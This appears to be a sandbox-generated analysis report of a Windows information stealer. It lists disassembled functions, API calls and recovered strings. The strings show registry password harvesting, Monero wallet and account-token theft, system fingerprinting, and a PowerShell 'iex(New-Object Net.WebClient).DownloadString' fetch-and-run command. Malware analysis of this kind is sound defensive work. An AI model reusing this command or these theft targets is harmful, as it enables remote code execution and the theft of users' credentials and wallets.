                      • Part of subcall function 009572D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00957452
                      • Part of subcall function 009572D0: HeapFree.KERNEL32(00000000), ref: 00957459
                    • lstrcat.KERNEL32(00000000,009717FC), ref: 00957606
                    • lstrcat.KERNEL32(00000000,00000000), ref: 00957648
                    • lstrcat.KERNEL32(00000000, : ), ref: 0095765A
                    • lstrcat.KERNEL32(00000000,00000000), ref: 0095768F
                    • lstrcat.KERNEL32(00000000,00971804), ref: 009576A0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 009576D3
                    • lstrcat.KERNEL32(00000000,00971808), ref: 009576ED
                    • task.LIBCPMTD ref: 009576FB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                    • String ID: :
                    • API String ID: 2677904052-3653984579
                    • Opcode ID: 0fd984cf12532e2251b9d83d3e360fded21c4d39eaea06807200764a444ce84a
                    • Instruction ID: 5e231fbce601663c665fb3518bf941a07dd4b67c28accf6a7afa0940b939b167
                    • Opcode Fuzzy Hash: 0fd984cf12532e2251b9d83d3e360fded21c4d39eaea06807200764a444ce84a
                    • Instruction Fuzzy Hash: EB315C72901109DBCB04EBF5DD85EFF7378BB85306B144519F502A72A0DE34AA4ACB92
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,005BDC40,00000000,00020119,?), ref: 009640F4
                    • RegQueryValueExA.ADVAPI32(?,005BE3E0,00000000,00000000,00000000,000000FF), ref: 00964118
                    • RegCloseKey.ADVAPI32(?), ref: 00964122
                    • lstrcat.KERNEL32(?,00000000), ref: 00964147
                    • lstrcat.KERNEL32(?,005BE248), ref: 0096415B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: lstrcat$CloseOpenQueryValue
                    • String ID: H[$h[$[
                    • API String ID: 690832082-198580688
                    • Opcode ID: 830d039722be7a465fc643753ed122c5e2127e160d17ff9e4d4a5b4ac1d5fe41
                    • Instruction ID: abd05f1106f32186f312b17caa1eb7d0229567ca0b32066d5fce25fdfc71b0fe
                    • Opcode Fuzzy Hash: 830d039722be7a465fc643753ed122c5e2127e160d17ff9e4d4a5b4ac1d5fe41
                    • Instruction Fuzzy Hash: EF41A5B6D101086BDB14EBA0ED46FFE737DAB88300F008959B61657181EE755B888BE2
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,005BE158,00000000,?,00970E2C,00000000,?,00000000), ref: 00968130
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00968137
                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00968158
                    • __aulldiv.LIBCMT ref: 00968172
                    • __aulldiv.LIBCMT ref: 00968180
                    • wsprintfA.USER32 ref: 009681AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                    • String ID: %d MB$@
                    • API String ID: 2774356765-3474575989
                    • Opcode ID: 917a3a3eb6a3566d9e7e728f60df3e3e4c0fe74dc28b941c3b54083e38fb81f5
                    • Instruction ID: 560b4e68763cf21f2fa141374d8ad1dec1db0f020f3ec2b6f7821d3f99e5aee5
                    • Opcode Fuzzy Hash: 917a3a3eb6a3566d9e7e728f60df3e3e4c0fe74dc28b941c3b54083e38fb81f5
                    • Instruction Fuzzy Hash: 21213DB1E44218ABDB00DFD5CD49FAFB7B8FB44B14F104609F615BB280DB7869018BA5
                    APIs
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954839
                      • Part of subcall function 009547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00954849
                    • InternetOpenA.WININET(00970DF7,00000001,00000000,00000000,00000000), ref: 0095610F
                    • StrCmpCA.SHLWAPI(?,005BE8F8), ref: 00956147
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0095618F
                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009561B3
                    • InternetReadFile.WININET(?,?,00000400,?), ref: 009561DC
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0095620A
                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00956249
                    • InternetCloseHandle.WININET(?), ref: 00956253
                    • InternetCloseHandle.WININET(00000000), ref: 00956260
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                    • String ID:
                    • API String ID: 2507841554-0
                    • Opcode ID: dcd3e430ca6180125937cc024d2ae5f403e2af0d5ee7327774004a9486ebbd74
                    • Instruction ID: 3a810c09dc2fdc71742aa07635d8e62ea49449e5f258bb3a568b88474d361096
                    • Opcode Fuzzy Hash: dcd3e430ca6180125937cc024d2ae5f403e2af0d5ee7327774004a9486ebbd74
                    • Instruction Fuzzy Hash: 8F518FB1A00208ABDB20DFA1DD49BEE77B8EB44701F508199FA05A71C0DB746E89CF95
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0095733A
                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009573B1
                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0095740D
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00957452
                    • HeapFree.KERNEL32(00000000), ref: 00957459
                    • task.LIBCPMTD ref: 00957555
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Heap$EnumFreeOpenProcessValuetask
                    • String ID: Password
                    • API String ID: 775622407-3434357891
                    • Opcode ID: 676034a22b11e39227a0abeff2323f8aafe999f364c23a6b3e0210121cda00a0
                    • Instruction ID: 3f044c041109e5e7b2a763547239242bb757da252959530e54a858c3dd068f99
                    • Opcode Fuzzy Hash: 676034a22b11e39227a0abeff2323f8aafe999f364c23a6b3e0210121cda00a0
                    • Instruction Fuzzy Hash: DC613CB59042589BDB24DF51DC45BDAB7B8BF84301F0081E9EA49A6181EF705FC9CFA1
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                    • lstrlen.KERNEL32(00000000), ref: 0095BC9F
                      • Part of subcall function 00968E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00968E52
                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0095BCCD
                    • lstrlen.KERNEL32(00000000), ref: 0095BDA5
                    • lstrlen.KERNEL32(00000000), ref: 0095BDB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                    • API String ID: 3073930149-1079375795
                    • Opcode ID: d39e085e917bcf883cd1671c0c5722e014548fc25e83d10268d86485721700b9
                    • Instruction ID: 07b27f77f2b4ec5bd6c4d1fa106ae67dcf03691a3ec4f8d424d262a24ab5716a
                    • Opcode Fuzzy Hash: d39e085e917bcf883cd1671c0c5722e014548fc25e83d10268d86485721700b9
                    • Instruction Fuzzy Hash: 23B11972910108ABDB04FBA4DD96FEE7339AF94300F504569F506B7092EF346A49CFA6
                    APIs
                    Strings
                    Yara matches
                    Similarity
                    • API ID: ExitProcess$DefaultLangUser
                    • String ID: *
                    • API String ID: 1494266314-163128923
                    • Opcode ID: 0652666142677b37aa7f8275b57a679daaddff747913b02d2f3359942f722c37
                    • Instruction ID: 1d9ace9ee8663b7345eabe0d246d2ad72d8dd0b843716dcfaf794a42ab3bdeb0
                    • Opcode Fuzzy Hash: 0652666142677b37aa7f8275b57a679daaddff747913b02d2f3359942f722c37
                    • Instruction Fuzzy Hash: EFF05E30908209EFD3449FE0EA0A72C7B70FB04703F24019AE60987290DA785F419BD6
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00954FCA
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00954FD1
                    • InternetOpenA.WININET(00970DDF,00000000,00000000,00000000,00000000), ref: 00954FEA
                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00955011
                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00955041
                    • InternetCloseHandle.WININET(?), ref: 009550B9
                    • InternetCloseHandle.WININET(?), ref: 009550C6
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                    • String ID:
                    • API String ID: 3066467675-0
                    • Opcode ID: 2e3e0840ae9d6beb26a12c2e40b9fda5e1cbe4e94c8bba68f705eeffcd3f8c3d
                    • Instruction ID: fc9419f008d1d7579cee9524e9af983a6144823ed9cf8b177211cc32bef82f2c
                    • Opcode Fuzzy Hash: 2e3e0840ae9d6beb26a12c2e40b9fda5e1cbe4e94c8bba68f705eeffcd3f8c3d
                    • Instruction Fuzzy Hash: 6F31F4B4A00218ABDB20CF94DD85BDDB7B4FB48704F1081D9FA09A7281DB746EC58F99
                    APIs
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00968426
                    • wsprintfA.USER32 ref: 00968459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0096847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 0096848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00968499
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                    • RegQueryValueExA.ADVAPI32(00000000,005BDFD8,00000000,000F003F,?,00000400), ref: 009684EC
                    • lstrlen.KERNEL32(?), ref: 00968501
                    • RegQueryValueExA.ADVAPI32(00000000,005BE110,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00970B34), ref: 00968599
                    • RegCloseKey.ADVAPI32(00000000), ref: 00968608
                    • RegCloseKey.ADVAPI32(00000000), ref: 0096861A
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                    • String ID: %s\%s
                    • API String ID: 3896182533-4073750446
                    • Opcode ID: 898a7a701b12c5a1fc4ad7ee83a89af752520c843a7cec6a00c2d81ecbe880e9
                    • Instruction ID: f869fbf4ee2430f055748143964cf369a10c0f43c78698e4f4a0c6e8da64051c
                    • Opcode Fuzzy Hash: 898a7a701b12c5a1fc4ad7ee83a89af752520c843a7cec6a00c2d81ecbe880e9
                    • Instruction Fuzzy Hash: 2421E9B1A10218ABDB24DB54DD85FE9B3B8FB48700F00C5D9E609A7180DF756A85CFD4
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009676A4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 009676AB
                    • RegOpenKeyExA.ADVAPI32(80000002,005AC320,00000000,00020119,00000000), ref: 009676DD
                    • RegQueryValueExA.ADVAPI32(00000000,005BDFC0,00000000,00000000,?,000000FF), ref: 009676FE
                    • RegCloseKey.ADVAPI32(00000000), ref: 00967708
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: Windows 11
                    • API String ID: 3225020163-2517555085
                    • Opcode ID: 6bedcef36afa81fee20a10f1265a5f1c5b02c02c2983fba627e293671320e3af
                    • Instruction ID: db5cebc7217cba19bb4adbe2f147a89aa71f560cfdefaacaabb757ecaf01290e
                    • Opcode Fuzzy Hash: 6bedcef36afa81fee20a10f1265a5f1c5b02c02c2983fba627e293671320e3af
                    • Instruction Fuzzy Hash: D00162B5A04304FBDB00DBE4DE8AF6DB7BCEB48705F104456FA04D7291EA7499008B91
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00967734
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0096773B
                    • RegOpenKeyExA.ADVAPI32(80000002,005AC320,00000000,00020119,009676B9), ref: 0096775B
                    • RegQueryValueExA.ADVAPI32(009676B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0096777A
                    • RegCloseKey.ADVAPI32(009676B9), ref: 00967784
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: CurrentBuildNumber
                    • API String ID: 3225020163-1022791448
                    • Opcode ID: 2fc6714925da996fbe91125ee45cd5e499a4c56f91ed52762c145b1ac0a0e2de
                    • Instruction ID: 7ac267c3fbadcead890ddd231c46d5542914d789c3f37213987f8d6b886a0e84
                    • Opcode Fuzzy Hash: 2fc6714925da996fbe91125ee45cd5e499a4c56f91ed52762c145b1ac0a0e2de
                    • Instruction Fuzzy Hash: D40112B5A40308FBDB00DBE4DD8AFAEB7B8EB48705F104559FA05A7281DA745A008B91
                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009599EC
                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A11
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00959A31
                    • ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959A5A
                    • LocalFree.KERNEL32(0095148F), ref: 00959A90
                    • CloseHandle.KERNEL32(000000FF), ref: 00959A9A
                    Yara matches
                    Similarity
                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                    • String ID:
                    • API String ID: 2311089104-0
                    • Opcode ID: ba65c46d4ee004665e37298c487e263b046f18eeee152afddb6ef36bb4e46c93
                    • Instruction ID: 1d3baad735dc0b836cc7c49e76807a31af63f55e15e81a8a977f95d71174de83
                    • Opcode Fuzzy Hash: ba65c46d4ee004665e37298c487e263b046f18eeee152afddb6ef36bb4e46c93
                    • Instruction Fuzzy Hash: 17314D74A00209EFDF14CF95C985BAE77B9FF48341F108159E901A7290DB78A945CFA1
                    APIs
                    • lstrcat.KERNEL32(?,005BE1D0), ref: 009647DB
                      • Part of subcall function 00968DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00968E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00964801
                    • lstrcat.KERNEL32(?,?), ref: 00964820
                    • lstrcat.KERNEL32(?,?), ref: 00964834
                    • lstrcat.KERNEL32(?,005AB748), ref: 00964847
                    • lstrcat.KERNEL32(?,?), ref: 0096485B
                    • lstrcat.KERNEL32(?,005BDAE0), ref: 0096486F
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 00968D90: GetFileAttributesA.KERNEL32(00000000,?,00951B54,?,?,0097564C,?,?,00970E1F), ref: 00968D9F
                      • Part of subcall function 00964570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00964580
                      • Part of subcall function 00964570: RtlAllocateHeap.NTDLL(00000000), ref: 00964587
                      • Part of subcall function 00964570: wsprintfA.USER32 ref: 009645A6
                      • Part of subcall function 00964570: FindFirstFileA.KERNEL32(?,?), ref: 009645BD
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                    • String ID:
                    • API String ID: 2540262943-0
                    • Opcode ID: 415d2a69fed172125bc8191c4c4984bdec59f78158243cfd82deec7ed653c376
                    • Instruction ID: 14d2507573cb99a151b9ec19528eb47efd8a345702f8602bd2eb5d01b629330e
                    • Opcode Fuzzy Hash: 415d2a69fed172125bc8191c4c4984bdec59f78158243cfd82deec7ed653c376
                    • Instruction Fuzzy Hash: B9314FB2900218A7CF14FBB0DC85FEA737CAB98700F444989B75997091EE74A789CF95
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00962D85
                    Strings
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00962D04
                    • ')", xrefs: 00962CB3
                    • <, xrefs: 00962D39
                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00962CC4
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    • API String ID: 3031569214-898575020
                    • Opcode ID: e211b59094e64f98de4eaea0732ebf1fae38ea78ccf6213f49ca40fed4e9ec59
                    • Instruction ID: a117790c6ea1301d7da6d6e255618b1f465060aba082b794d8bfb6183ee2c8d0
                    • Opcode Fuzzy Hash: e211b59094e64f98de4eaea0732ebf1fae38ea78ccf6213f49ca40fed4e9ec59
                    • Instruction Fuzzy Hash: DA41EE71C102089ADB18FFA0CC96BEEBB78AF90340F504119F106B7191EF746A4ACF96
                    APIs
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00959F41
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    Strings
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$AllocLocal
                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                    • API String ID: 4171519190-1096346117
                    • Opcode ID: 8e53eaae86900265958b28d891892a5e65f9111df5aad759c6a2760d0b1b9171
                    • Instruction ID: cc63208a5fe2f420cd235f24618bd11d1ac8409d0adb1942dd0629b903e7e052
                    • Opcode Fuzzy Hash: 8e53eaae86900265958b28d891892a5e65f9111df5aad759c6a2760d0b1b9171
                    • Instruction Fuzzy Hash: 53614F71A10248EFDB14EFA5CC96FED7775AF85344F008118F90A6B191EB746A0ACB92
                    APIs
                    • GetSystemTime.KERNEL32(?), ref: 0096696C
                    • sscanf.NTDLL ref: 00966999
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009669B2
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009669C0
                    • ExitProcess.KERNEL32 ref: 009669DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$System$File$ExitProcesssscanf
                    • String ID:
                    • API String ID: 2533653975-0
                    • Opcode ID: 852e1f1ebfa751098ad1e3867109b58c2f99e4eb8151fdbcca0ff1aa5a77fbb5
                    • Instruction ID: 8c98b2c131548a6f839d70dab3d6d40e43beae8f37fa2b691a00d549a5dd9626
                    • Opcode Fuzzy Hash: 852e1f1ebfa751098ad1e3867109b58c2f99e4eb8151fdbcca0ff1aa5a77fbb5
                    • Instruction Fuzzy Hash: E121A9B5D14209ABCF08EFE4D955AEEB7B9BF48300F04852AE506F3250EB345605CBA9
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00967E37
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00967E3E
                    • RegOpenKeyExA.ADVAPI32(80000002,005AC128,00000000,00020119,?), ref: 00967E5E
                    • RegQueryValueExA.ADVAPI32(?,005BDA60,00000000,00000000,000000FF,000000FF), ref: 00967E7F
                    • RegCloseKey.ADVAPI32(?), ref: 00967E92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: eedb30af7c2f98b99dfe3028a5c6a26be2dc4ccd24570ccb00103e26d76329bf
                    • Instruction ID: 488b19d0f7f25a9583808bf63078d0f271228db0d00a541956c71c25f2c701e6
                    • Opcode Fuzzy Hash: eedb30af7c2f98b99dfe3028a5c6a26be2dc4ccd24570ccb00103e26d76329bf
                    • Instruction Fuzzy Hash: 60119EB1A44205EBD700CFD4DE8AFBBFBB8EB44B04F10415AFA05A7290DB7958048BE1
                    APIs
                    • StrStrA.SHLWAPI(005BDF30,?,?,?,0096140C,?,005BDF30,00000000), ref: 0096926C
                    • lstrcpyn.KERNEL32(00B9AB88,005BDF30,005BDF30,?,0096140C,?,005BDF30), ref: 00969290
                    • lstrlen.KERNEL32(?,?,0096140C,?,005BDF30), ref: 009692A7
                    • wsprintfA.USER32 ref: 009692C7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpynlstrlenwsprintf
                    • String ID: %s%s
                    • API String ID: 1206339513-3252725368
                    • Opcode ID: dc7b4b91017088a726ff1a171b722cf5c06b090df25674f1b65e5160f97c6b97
                    • Instruction ID: 982c272ac6f3c6b41422d887b9e1edb24f3cede4360ef31876a417ac7dd80af6
                    • Opcode Fuzzy Hash: dc7b4b91017088a726ff1a171b722cf5c06b090df25674f1b65e5160f97c6b97
                    • Instruction Fuzzy Hash: BB01DA76500108FFCB04DFECCA99EAE7BB9EB48354F108598F9099B204CA35AE40DBD1
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009512B4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 009512BB
                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009512D7
                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009512F5
                    • RegCloseKey.ADVAPI32(?), ref: 009512FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
